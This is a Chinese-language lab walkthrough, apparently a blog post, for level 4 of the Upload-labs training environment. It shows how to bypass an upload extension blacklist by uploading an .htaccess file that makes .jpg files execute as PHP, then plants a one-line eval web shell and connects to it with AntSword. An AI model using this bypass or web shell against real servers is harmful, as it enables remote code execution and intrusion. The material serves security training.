Upload-labs第四关

本次考验的是黑名单绕过,查看禁用的文件如下:

  $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".

我们可以尝试.htaccess绕过,查看Apache文件存在 AllowOverride All,那么我们可以上传自己构造的恶意htaccess覆盖掉之前的配置文件,从而绕过黑名单限制。

DocumentRoot  "C:\phpstudy\WWW"
<Directory />
    Options +Indexes +FollowSymLinks +ExecCGI
    AllowOverride All
    Order allow,deny
    Allow from all
    Require all granted
</Directory>

首先上传.htaccess文件
创建.htaccess文件,编辑如下

#以下代码目的:
设置所有的jpg格式的文件以php格式执行

<FilesMatch "\.jpg">
  SetHandler application/x-httpd-php
</FilesMatch>

以下代码目的:设置muma.jpg文件以php格式执行

<FilesMatch "muma.jpg">
  SetHandler application/x-httpd-php
</FilesMatch>

示例:
在这里插入图片描述
上传一个phpinfo,看是否成功:

<?php phpinfo();?>

访问文件地址:
在这里插入图片描述
写入一句话木马,修改文件后缀为.jpg:

<?php eval($_REQUEST[123])?>

蚁剑连接:
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值